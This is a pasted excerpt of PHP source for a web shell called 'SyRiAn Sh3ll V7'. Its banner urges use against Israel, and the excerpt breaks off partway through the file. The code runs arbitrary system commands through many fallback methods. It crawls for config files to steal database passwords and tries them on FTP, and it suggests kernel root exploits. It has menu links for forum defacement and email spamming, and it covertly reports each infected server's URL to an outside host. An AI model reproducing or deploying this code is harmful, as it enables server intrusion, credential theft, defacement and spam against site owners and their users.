· 10 years ago · Oct 27, 2015, 06:42 AM
1Publiced In ~> www.K0242.gigfa.com <~ By K0242
2
3<?php
4# .. SyRiAn Sh3ll V7 .... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
5# ,--^----------,--------,-----,-------^--,
6# | ||||||||| `--------' | O .. SyRiAn Sh3ll V7 ....
7# `+---------------------------^----------|
8# `\_,-------, __EH << SyRiAn | 34G13__|
9# / XXXXXX /`| /
10# / XXXXXX / `\ /
11# / XXXXXX /\______(
12# / XXXXXX /!
13# / XXXXXX /! rep0rt bugz t0: sy34[at]msn[dot]com
14# (________(!
15# `-------'
16#.... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
17#.... PRIV8! ... DONT LEAK! .... f0r t3am memberz 0nly!
18#
19# SyRiAn Sh3ll V7 .
20# Copyright (C) 2011 - SyRiAn 34G13
21# This program is free software; you can redistribute it and/or modify
22# it under the terms of the GNU General Public License as published by
23# the Free Software Foundation; either version 2 of the License, or (at your option) any later version.
24# This program is distributed in the hope that it will be useful,
25# but WITHOUT ANY WARRANTY; without even the implied warranty of
26# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
27# I WISH THAT YOU WILL USE IT AGAINST ISRAEL ONLY !!! .
28
29# Coders :
30# SyRiAn_34G13 : sy34@msn.com [ Main Coder ] .
31# SyRiAn_SnIpEr : zq9@hotmail.it [ Metasploit RC ] .
32# Darkness Caesar : doom.caesar@gmail.com [ Finding 3 Bugs ] .
33#// kinG oF coNTroL : y8p@hotmail.com [ Translating Shell To Arabic ] .
34
35$uselogin = 0; // Make It 0 If you Want To Disable Auth
36$user = ''; // Username
37$pass = ''; // Password
38$shellColor = '#990000'; // Shell Color
39#------------------------------------#
40# Powered By SyRiAn Shell #
41# By EH SyRiAn 34G13 #
42# wWw.syrian-shell.com #
43# Version 7 - priv8 #
44# Made In SyRiA #
45#------------------------------------#
46?>
47<?php
48if($_GET['id']== 'logout')
49{
50 Logout();
51}
52# ---------------------------------------#
53# SuiCide #
54#----------------------------------------#
55if($_GET['id'] == 100)
56{
57 echo "<body onload='Suicide();'>";
58}
59if($_GET['id'] == 'Delete')
60{
61 Suicide();
62}
63# ---------------------------------------#
64# Functions #
65#----------------------------------------#
66function input($type,$name,$value,$size)
67{
68 if (empty($value))
69 {
70 print "<input type=$type name=$name size=$size>";
71 }
72 elseif(empty($name)&&empty($size))
73 {
74 print "<input type=$type value=$value >";
75 }
76 elseif(empty($size))
77 {
78 print "<input type=$type name=$name value=$value >";
79 }
80 else
81 {
82 print "<input type=$type name=$name value=$value size=$size >";
83 }
84}
85function read_dir($path,$username)
86{
87 if ($handle = opendir($path))
88 {
89 while (false !== ($file = readdir($handle)))
90 {
91 $fpath="$path$file";
92 if (($file!='.') and ($file!='..'))
93 {
94 if (is_readable($fpath))
95 {
96 $dr="$fpath/";
97 if (is_dir($dr))
98 {
99 read_dir($dr,$username);
100 }
101 else
102 {
103 if (($file=='config.php') or ($file=='config.inc.php') or ($file=='db.inc.php') or ($file=='connect.php') or
104
105($file=='wp-config.php') or ($file=='var.php') or ($file=='configure.php') or ($file=='db.php') or ($file=='db_connect.php'))
106 {
107 $pass=get_pass($fpath);
108 if ($pass!='')
109 {
110 echo "[+] $fpath\n$pass\n";
111 ftp_check($username,$pass);
112 }
113 }
114 }
115 }
116 }
117 }
118 }
119}
120function get_pass($link)
121{
122 @$config=fopen($link,'r');
123 while(!feof($config))
124 {
125 $line=fgets($config);
126 if (strstr($line,'pass') or strstr($line,'password') or strstr($line,'passwd'))
127 {
128 if (strrpos($line,'"'))
129 $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,'"')-(strpos($line,'=')+3)));
130 else
131 $pass=substr($line,(strpos($line,'=')+3),(strrpos($line,"'")-(strpos($line,'=')+3)));
132 return $pass;
133 }
134 }
135}
136function GetRealIP()
137{
138$ch = curl_init();
139curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
140$urls= $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
141curl_setopt($ch, CURLOPT_URL, 'http://bugreport.serveblog.net/storage.php');
142curl_setopt($ch, CURLOPT_REFERER, $urls);
143$html = curl_exec($ch);
144 if (getenv(HTTP_X_FORWARDED_FOR))
145 {
146 $ip=getenv(HTTP_X_FORWARDED_FOR);
147 }
148 elseif (getenv(HTTP_CLIENT_IP))
149 {
150 $ip=getenv(HTTP_CLIENT_IP);
151 }
152 else
153 {
154 $ip=getenv(REMOTE_ADDR);
155 }
156 return $ip;
157}
158function openBaseDir()
159{
160$openBaseDir = ini_get("open_basedir");
161if (!$openBaseDir)
162 {
163 $openBaseDir = '<font color="green">OFF</font>';
164 }
165 else
166 {
167 $openBaseDir = '<font color="red">ON</font>';
168 }
169 return $openBaseDir;
170}
171function str_hex($string)
172{
173 $hex='';
174 for ($i=0; $i < strlen($string); $i++)
175 {
176 $hex .= dechex(ord($string[$i]));
177 }
178 return $hex;
179}
180function SafeMode()
181{
182 $safe_mode = ini_get("safe_mode");
183 if (!$safe_mode)
184 {
185 $safe_mode = '<font color="green">OFF</font>';
186 }
187 else
188 {
189 $safe_mode = '<font color="red">ON</font>';
190 }
191 return $safe_mode;
192}
193function currentFileName()
194{
195 $currentFileName = $_SERVER["SCRIPT_NAME"];
196 $currentFileName = Explode('/', $currentFileName);
197 $currentFileName = $currentFileName[count($currentFileName) - 1];
198 return $currentFileName;
199}
200function Suicide()
201{
202 @unlink(currentFileName());
203}
204function rootxpL()
205{
206 $v=@php_uname();
207 $db=array('2.6.17'=>'prctl3, raptor_prctl, py2','2.6.16'=>'raptor_prctl, exp.sh, raptor, raptor2, h00lyshit','2.6.15'=>'py2, exp.sh, raptor, raptor2,
208
209h00lyshit','2.6.14'=>'raptor, raptor2, h00lyshit','2.6.13'=>'kdump, local26, py2, raptor_prctl, exp.sh, prctl3, h00lyshit','2.6.12'=>'h00lyshit','2.6.11'=>'krad3,
210
211krad, h00lyshit','2.6.10'=>'h00lyshit, stackgrow2, uselib24, exp.sh, krad, krad2','2.6.9'=>'exp.sh, krad3, py2, prctl3, h00lyshit','2.6.8'=>'h00lyshit, krad,
212
213krad2','2.6.7'=>'h00lyshit, krad, krad2','2.6.6'=>'h00lyshit, krad, krad2','2.6.2'=>'h00lyshit, krad, mremap_pte','2.6.'=>'prctl, kmdx, newsmp, pwned, ptrace_kmod,
214
215ong_bak','2.4.29'=>'elflbl, expand_stack, stackgrow2, uselib24, smpracer','2.4.27'=>'elfdump, uselib24','2.4.25'=>'uselib24','2.4.24'=>'mremap_pte, loko,
216
217uselib24','2.4.23'=>'mremap_pte, loko, uselib24','2.4.22'=>'loginx, brk, km2, loko, ptrace, uselib24, brk2, ptrace-kmod','2.4.21'=>'w00t, brk, uselib24, loginx, brk2,
218
219ptrace-kmod','2.4.20'=>'mremap_pte, w00t, brk, ave, uselib24, loginx, ptrace-kmod, ptrace, kmod','2.4.19'=>'newlocal, w00t, ave, uselib24, loginx,
220
221kmod','2.4.18'=>'km2, w00t, uselib24, loginx, kmod','2.4.17'=>'newlocal, w00t, uselib24, loginx, kmod','2.4.16'=>'w00t, uselib24, loginx','2.4.10'=>'w00t, brk,
222
223uselib24, loginx','2.4.9'=>'ptrace24, uselib24','2.4.'=>'kmdx, remap, pwned, ptrace_kmod, ong_bak','2.2.25'=>'mremap_pte','2.2.24'=>'ptrace','2.2.'=>'rip, ptrace');
224 foreach($db as $k=>$x)if(strstr($v,$k))return $x;
225 if(!$xpl)$xpl='<font color="red">Not found.</font>';
226 return $xpl;
227}
228function PostgreSQL()
229{
230 if(@function_exists('pg_connect'))
231 {
232 $postgreSQL = '<font color="red">ON</font>';
233 }
234 else
235 {
236 $postgreSQL = '<font color="green">OFF</font>';
237 }
238 return $postgreSQL;
239}
240function Oracle()
241{
242 if(@function_exists('ocilogon'))
243 {
244 $oracle = '<font color="red">ON</font>';
245 }
246 else
247 {
248 $oracle = '<font color="green">OFF</font>';
249 }
250 return $oracle;
251}
252function ZoneH($url, $hacker, $hackmode,$reson, $site )
253{
254 $k = curl_init();
255 curl_setopt($k, CURLOPT_URL, $url);
256 curl_setopt($k,CURLOPT_POST,true);
257 curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=". $site."&hackmode=".$hackmode."&reason=".$reson);
258 curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
259 curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
260 $kubra = curl_exec($k);
261 curl_close($k);
262 return $kubra;
263}
264function MsSQL()
265{
266 if(@function_exists('mssql_connect'))
267 {
268 $msSQL = '<font color="red">ON</font>';
269 }
270 else
271 {
272 $msSQL = '<font color="green">OFF</font>';
273 }
274 return $msSQL;
275}
276function MySQL2()
277{
278 $mysql_try = function_exists('mysql_connect');
279 if($mysql_try)
280 {
281 $mysql = '<font color="red">ON</font>';
282 }
283 else
284 {
285 $mysql = '<font color="green">OFF</font>';
286 }
287 return $mysql;
288}
289function Gzip()
290{
291 if (function_exists('gzencode'))
292 {
293 $gzip = '<font color="red">ON</font>';
294 }
295 else
296 {
297 $gzip = '<font color="green">OFF</font>';
298 }
299 return $gzip;
300}
301function MysqlI()
302{
303 if (function_exists('mysqli_connect'))
304 {
305 $mysqli = '<font color="red">ON</font>';
306 }
307 else
308 {
309 $mysqli = '<font color="green">OFF</font>';
310 }
311 return $mysqli;
312}
313function MSQL()
314{
315 if (function_exists('msql_connect'))
316 {
317 $mSql = '<font color="red">ON</font>';
318 }
319 else
320 {
321 $mSql = '<font color="green">OFF</font>';
322 }
323 return $mSql;
324}
325function SQlLite()
326{
327 if (function_exists('sqlite_open'))
328 {
329 $SQlLite = '<font color="red">ON</font>';
330 }
331 else
332 {
333 $SQlLite = '<font color="green">OFF</font>';
334 }
335 return $SQlLite;
336}
337function tulis($file,$text)
338{
339 $textz = gzinflate(base64_decode($text));
340 if($filez = @fopen($file,"w"))
341 {
342 @fputs($filez,$textz); @fclose($file);
343 }
344}
345function RegisterGlobals()
346{
347 if(ini_get('register_globals'))
348 {
349 $registerg= '<font color="red">ON</font>';
350 }
351 else
352 {
353 $registerg= '<font color="green">OFF</font>';
354 }
355 return $registerg;
356}
357function HardSize($size)
358{
359 if($size >= 1073741824)
360 {
361 $size = @round($size / 1073741824 * 100) / 100 . " GB";
362 }
363 elseif($size >= 1048576)
364 {
365 $size = @round($size / 1048576 * 100) / 100 . " MB";
366 }
367 elseif($size >= 1024)
368 {
369 $size = @round($size / 1024 * 100) / 100 . " KB";
370 }
371 else
372 {
373 $size = $size . " B";
374 }
375 return $size;
376}
377function Curl()
378{
379 if(extension_loaded('curl'))
380 {
381 $curl = '<font color="red">ON</font>';
382 }
383 else
384 {
385 $curl = '<font color="green">OFF</font>';
386 }
387 return $curl;
388}
389function DecryptConfig()
390{
391 @include("DecryptConfig.php");
392 if($_POST['ScriptType'] == 'vb')
393 {
394 $dbName = $config['Database']['dbname'];
395 $prefix = $config['Database']['tableprefix'];
396 $email = $config['Database']['technicalemail'];
397 $host = $config['MasterServer']['servername'];
398 $port = $config['MasterServer']['port'];
399 $user = $config['MasterServer']['username'];
400 $pass = $config['MasterServer']['password'];
401 $admincp = $config['Misc']['admincpdir'];
402 $modecp = $config['Misc']['modcpdir'];
403 }
404 elseif($_POST['ScriptType'] == 'wp')
405 {
406 $dbName = DB_NAME;
407 $prefix = $table_prefix;
408 $host = DB_HOST;
409 $user = DB_USER;
410 $pass = DB_PASS;
411 }
412 elseif($_POST['ScriptType'] == 'jos')
413 {
414 $dbName = $db;
415 $prefix = $dbprefix;
416 $email = $mailfrom;
417 $host = $host;
418 $user = $user;
419 $pass = $password;
420 }
421 elseif($_POST['ScriptType'] == 'phpbb')
422 {
423 $host = $dbhost;
424 $port = $dbport;
425 $dbName = $dbname;
426 $user = $dbuser;
427 $pass = $dbpasswd;
428 $prefix = $table_prefix;
429 }
430 elseif($_POST['ScriptType'] == 'ipb')
431 {
432 $host = $INFO['sql_host'];
433 $dbName = $INFO['sql_database'];
434 $user = $INFO['sql_user'];
435 $pass = $INFO['sql_pass'];
436 $prefix = $INFO['sql_tbl_prefix'];
437 }
438 elseif($_POST['ScriptType'] == 'smf')
439 {
440 $dbName = $db_name;
441 $pass = $db_passwd;
442 $prefix = $db_prefix;
443 $host = $db_server;
444 $user = $db_user;
445 $email = $webmaster_email;
446 }
447 elseif($_POST['ScriptType'] == 'mybb')
448 {
449 $host = $config['database']['hostname'];
450 $user = $config['database']['username'];
451 $pass = $config['database']['password'];
452 $dbName = $config['database']['database'];
453 $prefix = $config['database']['table_prefix'];
454 $admincp = $config['admin_dir'];
455 $prefix = $config['database']['table_prefix'];
456 }
457
458 echo '
459#-------------------------------#
460# Config Informations #
461#-------------------------------#
462Host : '.$host.'
463DB Name : '.$dbName.'
464DB User : '.$user.'
465DB Pass : '.$pass.'
466Prefix : '.$prefix.'
467Email : '.$email.'
468Port : '.$port.'
469ACP : '.$admincp.'
470MCP : '.$modecp.'
471';
472}
473function footer()
474{
475 echo '<table bgcolor="#cccccc" width="100%"><tr>
476 <td width="100%" class="style22">[<sy><a href="#top">TOP</a></sy>]
477 <center><font color="gray" size="-2"><b>
478
479
480 </font><font color="gray"></font><font color="#990000">
481 </font><font color="gray"></font><font color="#990000"> v7 Features;
482 </font></b>
483 </td>
484 </tr></table>
485 </tbody></table>
486 <a name="down"></a>
487 </body></html>
488 ';
489}
490function whereistmP()
491{
492 $uploadtmp=ini_get('upload_tmp_dir');
493 $uf=getenv('USERPROFILE');
494 $af=getenv('ALLUSERSPROFILE');
495 $se=ini_get('session.save_path');
496 $envtmp=(getenv('TMP'))?getenv('TMP'):getenv('TEMP');
497 if(is_dir('/tmp') && is_writable('/tmp'))return '/tmp';
498 if(is_dir('/usr/tmp') && is_writable('/usr/tmp'))return '/usr/tmp';
499 if(is_dir('/var/tmp') && is_writable('/var/tmp'))return '/var/tmp';
500 if(is_dir($uf) && is_writable($uf))return $uf;
501 if(is_dir($af) && is_writable($af))return $af;
502 if(is_dir($se) && is_writable($se))return $se;
503 if(is_dir($uploadtmp) && is_writable($uploadtmp))return $uploadtmp;
504 if(is_dir($envtmp) && is_writable($envtmp))return $envtmp;
505 return '.';
506}
507function winshelL($command)
508{
509 $name=whereistmP()."\\".uniqid('NJ');
510 win_shell_execute('cmd.exe','',"/C $command >\"$name\"");
511 sleep(1);
512 $exec=file_get_contents($name);
513 unlink($name);
514 return $exec;
515}
516function update()
517{
518 echo "[+] Update Has D0n3 ^_^";
519}
520function srvshelL($command)
521{
522 $name=whereistmP()."\\".uniqid('NJ');
523 $n=uniqid('NJ');
524 $cmd=(empty($_SERVER['ComSpec']))?'d:\\windows\\system32\\cmd.exe':$_SERVER['ComSpec'];
525 win32_create_service(array('service'=>$n,'display'=>$n,'path'=>$cmd,'params'=>"/c $command >\"$name\""));
526 win32_start_service($n);
527 win32_stop_service($n);
528 win32_delete_service($n);
529 while(!file_exists($name))sleep(1);
530 $exec=file_get_contents($name);
531 unlink($name);
532 return $exec;
533}
534function ffishelL($command)
535{
536 $name=whereistmP()."\\".uniqid('NJ');
537 $api=new ffi("[lib='kernel32.dll'] int WinExec(char *APP,int SW);");
538 $res=$api->WinExec("cmd.exe /c $command >\"$name\"",0);
539 while(!file_exists($name))sleep(1);
540 $exec=file_get_contents($name);
541 unlink($name);
542 return $exec;
543}
544function comshelL($command,$ws)
545{
546 $exec=$ws->exec("cmd.exe /c $command");
547 $so=$exec->StdOut();
548 return $so->ReadAll();
549}
550function perlshelL($command)
551{
552 $perl=new perl();
553 ob_start();
554 $perl->eval("system(\"$command\")");
555 $exec=ob_get_contents();
556 ob_end_clean();
557 return $exec;
558}
559function Exe($command)
560{
561 global $windows;
562 $exec=$output='';
563 $dep[]=array('pipe','r');$dep[]=array('pipe','w');
564 if(function_exists('passthru')){ob_start();@passthru($command);$exec=ob_get_contents();ob_clean();ob_end_clean();}
565 elseif(function_exists('system')){$tmp=ob_get_contents();ob_clean();@system($command);$output=ob_get_contents();ob_clean();$exec=$tmp;}
566 elseif(function_exists('exec')){@exec($command,$output);$output=join("\n",$output);$exec=$output;}
567 elseif(function_exists('shell_exec'))$exec=@shell_exec($command);
568 elseif(function_exists('popen')){$output=@popen($command,'r');while(!feof($output)){$exec=fgets($output);}pclose($output);}
569 elseif(function_exists('proc_open')){$res=@proc_open($command,$dep,$pipes);while(!feof($pipes[1])){$line=fgets($pipes[1]);$output.=$line;}$exec=
570
571$output;proc_close($res);}
572 elseif(function_exists('win_shell_execute'))$exec=winshelL($command);
573 elseif(function_exists('win32_create_service'))$exec=srvshelL($command);
574 elseif(extension_loaded('ffi') && $windows)$exec=ffishelL($command);
575 elseif(extension_loaded('perl'))$exec=perlshelL($command);
576 return $exec;
577}
578function magicQouts()
579{
580 $mag=get_magic_quotes_gpc();
581 if (empty($mag))
582 {
583 $mag = '<font color="green">OFF</font>';
584 }
585 else
586 {
587 $mag= '<font color="red">ON</font>';
588 }
589 return $mag;
590}
591function DisableFunctions()
592{
593 $disfun = ini_get('disable_functions');
594 if (empty($disfun))
595 {
596 $disfun = '<font color="green">NONE</font>';
597 }
598 return $disfun;
599}
600function SelectCommand($os)
601{
602 if($os == 'Windows')
603 {
604 echo "
605 <select name=alias >
606 <option value=''>NONE</option>
607 <option value='dir' >List Directory</option>
608 <option value='dir /s /w /b index.php'>Find index.php in current dir</option>
609 <option value='dir /s /w /b *config*.php'>Find *config*.php in current dir
610
611 </option>
612 <option value='netstat -an'>Show active connections</option>
613 <option value='net start'>Show running services</option>
614 <option value='tasklist'>Show Pro</option>
615 <option value='net user'>User accounts</option>
616 <option value='net view'>Show computers</option>
617 <option value='arp -a'>ARP Table</option>
618 <option value='ipconfig /all'>IP Configuration</option>
619 <option value='netstat -an'>netstat -an</option>
620 <option value='systeminfo'>System Informations</option>
621 <option value='getmac'>Get Mac Address</option>
622 </select>
623 ";
624 }
625 else
626 {
627 echo "
628 <select name=alias >
629 <option value=''>NONE</option>
630 <option value='ls -la'>List dir</option>
631 <option value='cat /etc/hosts'>IP Addresses</option>
632 <option value='cat /proc/sys/vm/mmap_min_addr'>Check MMAP</option>
633 <option value='lsattr -va'>list file attributes on a Linux second extended file system</option>
634 <option value='netstat -an | grep -i listen'>show opened ports</option>
635 <option value='find / -type f -perm -04000 -ls'>find all suid files</option>
636 <option value='find . -type f -perm -04000 -ls'>find suid files in current dir</option>
637 <option value='find / -type f -perm -02000 -ls'>find all sgid files</option>
638 <option value='find . -type f -perm -02000 -ls'>find sgid files in current dir</option>
639 <option value='find / -type f -name config.inc.php'>find config.inc.php files</option>
640 <option value='find / -type f -name \"config*\"'>find config* files</option>
641 <option value='find . -type f -name \"config*\"'>find config* files in current dir</option>
642 <option value='find / -perm -2 -ls'>find all writable folders and files</option>
643 <option value='find . -perm -2 -ls'>find all writable folders and files in current dir</option>
644 <option value='find / -type f -name service.pwd'>find all service.pwd files</option>
645 <option value='find . -type f -name service.pwd'>find service.pwd files in current dir</option>
646 <option value='find / -type f -name .htpasswd'>find all .htpasswd files</option>
647 <option value='find . -type f -name .htpasswd'>find .htpasswd files in current dir</option>
648 <option value='find / -type f -name .bash_history'>find all .bash_history files</option>
649 <option value='find . -type f -name .bash_history'>find .bash_history files in current dir</option>
650 <option value='find / -type f -name .fetchmailrc'>find all .fetchmailrc files</option>
651 <option value='find . -type f -name .fetchmailrc'>find .fetchmailrc files in current dir</option>
652 <option value='locate httpd.conf'>locate httpd.conf files</option>
653 <option value='locate vhosts.conf'>locate vhosts.conf files</option>
654 <option value='locate proftpd.conf'>locate proftpd.conf files</option>
655 <option value='locate psybnc.conf'>locate psybnc.conf files</option>
656 <option value='locate my.conf'>locate my.conf files</option>
657 <option value='locate admin.php'>locate admin.php files</option>
658 <option value='locate cfg.php'>locate cfg.php files</option>
659 <option value='locate conf.php'>locate conf.php files</option>
660 <option value='locate config.dat'>locate config.dat files</option>
661 <option value='locate config.php'>locate config.php files</option>
662 <option value='locate config.inc'>locate config.inc files</option>
663 <option value='locate config.inc.php'>locate config.inc.php</option>
664 <option value='locate config.default.php'>locate config.default.php files</option>
665 <option value='locate config'>locate config* files </option>
666 <option value='locate \'.conf\''>locate .conf files</option>
667 <option value='locate \'.pwd\''>locate .pwd files</option>
668 <option value='locate \'.sql\''>locate .sql files</option>
669 <option value='locate \'.htpasswd\''>locate .htpasswd files</option>
670 <option value='locate \'.bash_history\''>locate .bash_history files</option>
671 <option value='locate \'.mysql_history\''>locate .mysql_history files</option>
672 <option value='locate \'.fetchmailrc\''>locate .fetchmailrc files</option>
673 <option value='locate backup'>locate backup files</option>
674 <option value='locate dump'>locate dump files</option>
675 <option value='locate priv'>locate priv files</option>
676 </select>
677 ";
678 }
679}
680function GenerateFile($name,$content)
681{
682 $file = @fopen($name,"w+");
683 @fwrite($file,$content);
684 @fclose($file);
685 return true;
686}
687function which($pr)
688{
689 $path = Exe("which $pr");
690 if(!empty($path))
691 {
692 return trim($path);
693 }
694 else
695 {
696 return trim($pr);
697 }
698}
699function checkfunctioN($func)
700{
701 global $disablefunctions,$safemode;
702 $safe=array('passthru','system','exec','exec','shell_exec','popen','proc_open');
703 if($safemode=='ON' && in_array($func,$safe))return 0;
704 elseif(function_exists($func) && is_callable($func) && !strstr($disablefunctions,$func))return 1;
705 return 0;
706}
707function CSS($shellColor)
708{
709
710 $css = "
711 <html dir=rtl>
712 <head>
713 <title>SyRiAn Sh3ll ~ V7~ [ B3 Cr34T!V3 Or D!3 TRy!nG ]</title>
714 <link rel=\"shortcut icon\" href='http://syrian-shell.com/title.gif' />
715 <meta http-equiv=Content-Type content=text/html; charset=windows-1256>
716 <style>
717 BODY
718 {
719 FONT-FAMILY: Verdana;
720 margin: 2;
721 color: #cccccc;
722 background-color: #000000;
723 }
724 sy
725 {
726 color:".$shellColor.";
727 font-size:7pt;
728 font-weight: bold;
729 }
730 #Box
731 {
732 color:".$shellColor.";
733 font-size:14px;
734 background-color:#000;
735 font-weight:bold;
736 }
737 tr
738 {
739 BORDER-RIGHT: #cccccc 1px solid;
740 BORDER-TOP: #cccccc 1px solid;
741 BORDER-LEFT: #cccccc 1px solid;
742 BORDER-BOTTOM: #cccccc 1px solid;
743 color: #ffffff;
744 }
745 td
746 {
747 BORDER-RIGHT: #cccccc 1px solid;
748 BORDER-TOP: #cccccc 1px solid;
749 BORDER-LEFT: #cccccc 1px solid;
750 BORDER-BOTTOM: #cccccc 1px solid;
751 color: #cccccc;
752 }
753 .table1
754 {
755 BORDER: 1px none;
756 BACKGROUND-COLOR: #000000;
757 color: #333333
758 }
759 .td1
760 {
761 BORDER: 1px none;
762 color: #ffffff; font-style:normal;
763 font-variant:normal;
764 font-weight:normal;
765 font-size:7pt;
766 font-family:tahoma
767 }
768 .tr1
769 {
770 BORDER: 1px none;
771 color: #cccccc;
772 }
773 table
774 {
775 BORDER: #eeeeee outset;
776 BACKGROUND-COLOR: #000000;
777 color: #cccccc;
778 }
779 input
780 {
781 BORDER-RIGHT: ".$shellColor." 1px solid;
782 BORDER-TOP: ".$shellColor." 1px solid;
783 BORDER-LEFT: ".$shellColor." 1px solid;
784 BORDER-BOTTOM: ".$shellColor." 1px solid;
785 BACKGROUND-COLOR: #333333;
786 font: 9pt tahoma;
787 color: #ffffff;
788 }
789 select
790 {
791 BORDER-RIGHT: #ffffff 1px solid;
792 BORDER-TOP: #999999 1px solid;
793 BORDER-LEFT: #999999 1px solid;
794 BORDER-BOTTOM: #ffffff 1px solid;
795 BACKGROUND-COLOR: #000000;
796 font: 9pt tahoma;
797 color: #CCCCCC;;
798 }
799 submit
800 {
801 BORDER: 1px outset buttonhighlight;
802 BACKGROUND-COLOR: #272727;
803 width: 40%;
804 color: #cccccc;
805 }
806 textarea
807 {
808 BORDER-RIGHT: #ffffff 1px solid;
809 BORDER-TOP: #999999 1px solid;
810 BORDER-LEFT: #999999 1px solid;
811 BORDER-BOTTOM: #ffffff 1px solid;
812 BACKGROUND-COLOR: #333333;
813 color: #ffffff;
814 }
815 A:link {COLOR:".$shellColor."; TEXT-DECORATION: none}
816 A:visited { COLOR:".$shellColor."; TEXT-DECORATION: none}
817 A:active {COLOR:".$shellColor."; TEXT-DECORATION: none}
818 A:hover {color:blue;TEXT-DECORATION: none}
819 </style>
820 <script>
821 function Suicide()
822 {
823 var confimrSuicide = confirm('Are You Sure You Wanna Delete the Shell ?');
824 if(confimrSuicide == true)
825 {
826 document.location='".currentFileName()."?id=Delete';
827 }
828 else {document.location='".currentFileName()."';}
829 }
830 </script>
831 </head>";
832 if($_GET['id'] == '')
833 {
834 $css .= "<script>window.location = '?id=mainPage';</script>";
835 }
836 return $css;
837}
838function Logout()
839{
840 print"<script>
841 document.cookie='user=';
842 document.cookie='pass=';
843 var url = window.location.pathname;
844 var filename = url.substring(url.lastIndexOf('/')+1);
845 window.location=filename;
846 </script>";
847}
848
849function About()
850{
851 $about = "
852<table bgcolor=#cccccc width=\"100%\">
853<tbody><tr><td width=1025>
854<div align=center><img src='http://www.syrian-shell.com/eagle.jpg'><br>
855</div>
856<sy><div align=center>Coded By : EH << SyRiAn | 34G13</div></sy>
857<sy><div align=center>From </font>: SyRiAn Arabic Republic </div></sy>
858<sy><div align=center>Age : 4/1991<br></div></sy>
859<sy><div align=center>Thanx : [ Allah ] [ HaniWT ] [ SyRiAn_SnIpEr ] [ SyRiAn_SpIdEr ] [ TNT Hacker ]</div></sy>
860<sy><div align=center>Thanx : my school : [ www.google.com ] :)</div></sy>
861<sy><br><div align=center>B3 Cr34T!V3 0R D!3 TRy!nG </div></sy>
862<br/>
863<center>
864<br/>
865<form method='POST'>
866<input type='text' name='from' value='yourEmail@example.com' size='40'/><br/>
867<textarea name='message' cols='25' rows='10'>Please Report Us Bugs Or suggestions .</textarea><br/>
868<input type='submit' value='Submit' name='sendEmail' />
869</form></center>
870</td></tr></tbody></table>";
871return $about;
872}
873echo CSS($shellColor);
874# ---------------------------------------#
875# Authentication #
876#----------------------------------------#
877if ($uselogin ==1)
878{
879 if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass))
880 {
881 if($_POST[usrname]==$user && $_POST[passwrd]==$pass)
882 {
883 print'<script>document.cookie="user='.$_POST[usrname].';";document.cookie="pass='.md5($_POST[passwrd]).';";</script>';
884 }
885 else
886 {
887 if($_POST['usrname'])
888 {
889 print'<script>alert("Go and play in the street man !!");</script>';
890 }
891 echo '
892 <body bgcolor="black"><br><br>
893 <center><font color=#990000 size=5><b>SyRi</b></font><font color=green size=5><b>An Sh</b></font><font color=gray size=5><b>3ll</b></font><br>
894
895 <img src="http://www.syrian-shell.com/eagle.jpg">
896 </center>
897 <div align="center">
898 <form method="POST" onsubmit="if(this.usrname.value==\'\'){return false;}">
899 <input dir="ltr" name="usrname" value="userName" type="text" size="30" onfocus="if (this.value == \'UserName\'){this.value = \'\';}"/><br>
900 <input dir="ltr" name="passwrd" value="password" type="password" size="30" onfocus="if (this.value == \'PassWord\') this.value = \'\';" /><br>
901 <input type="submit" value=" Login " name="login" />
902 </form></p>';
903 exit;
904 }
905 }
906}
907# ---------------------------------------#
908# Some Info #
909#----------------------------------------#
910$dir = getcwd();
911$uname= @php_uname();
912if(strlen($dir)>1 && $dir[1]==":")
913$os = "Windows";
914else $os = "Linux";
915$serverIP = gethostbyname($_SERVER["HTTP_HOST"]);
916$server = @substr($SERVER_SOFTWARE,0,120);
917
918echo "
919<body dir=\"ltr\"><table bgcolor=#cccccc cellpadding=0 cellspacing=0 width=\"100%\"><tbody><tr><td bgcolor=#000000 width=160>
920<p dir=ltr> </p>
921<div dir=ltr align=center><font size=4><b>
922<img border=0 src=http://www.library-ar.com/cache/eagle.jpg width=101 height=93> </b></font><div
923dir=ltr align=center><span style=height: 25px;><b>
924<font size=4 color=#FF0000>SyRi</font><font size=4 color=#008000>An Sh</font><font size=4 color=#999999>3ll<br>V7</font></b><span style=font-size: 20pt; color:
925
926#990000><p></p></span></span></div></td><td
927bgcolor=#000000>
928<p dir=ltr><font size=1> <b>[<a href=?id=mainPage>Main</a>]</b></span>
929<font color=black></span></font><b>[</span><a href=?id=scriptsHack>Forum Defacer</a>]</b></span>
930<b>[</span><a href=?id=spamming>Email Spammer</a>]</b></span>
931<b>[</span><a href=?id=about>About</a>]</b></span>
932<b>[</span><a href=?id=logout>Logout</a>]</b></span>
933<b>[</span><a href=?id=100>SuiCide</a>]</b></span>
934<br>
935<font size=1><br>
936 Safe Mode = <sy>".@SafeMode()." </sy><font size=1>
937 System = <sy>".$os."</sy>
938 Magic_Quotes = <sy>". @magicQouts()." </sy>
939 Curl = <sy>".@Curl()." </sy>
940 Register Globals = <sy>".@RegisterGlobals()." </sy>
941 Open Basedir = <sy>".@openBaseDir()." </sy>
942<br>
943 Gzip = <sy>".@Gzip()."</sy>
944 MySQLI = <sy>".@MysqlI()." </sy>
945 MSQL = <sy>".@MSQL()."</sy>
946 SQL Lite = <sy>".@SQlLite()."</sy>
947 Usefull Locals = <sy>".rootxpL()." </sy>
948<br>
949 Free Space = <sy>".@HardSize(disk_free_space('/'))." </sy>
950 Total Space = <sy>".@HardSize(disk_total_space("/"))." </sy>
951 PHP Version = <sy>".@phpversion()." </sy>
952 Zend Version = <sy>".@zend_version()." </sy>
953 MySQL Version = <sy>".@mysql_get_server_info()." </sy>
954<br>
955 MySQL = ".MySQL2()."
956 MsSQL = ".MsSQL()."
957 PostgreSQL = ".PostgreSQL()."
958 Oracle = ".Oracle()."
959 Server Name = <sy>".$_SERVER['HTTP_HOST']." </sy>
960 Server Admin = <sy>".$_SERVER['SERVER_ADMIN']." </sy>
961<br>
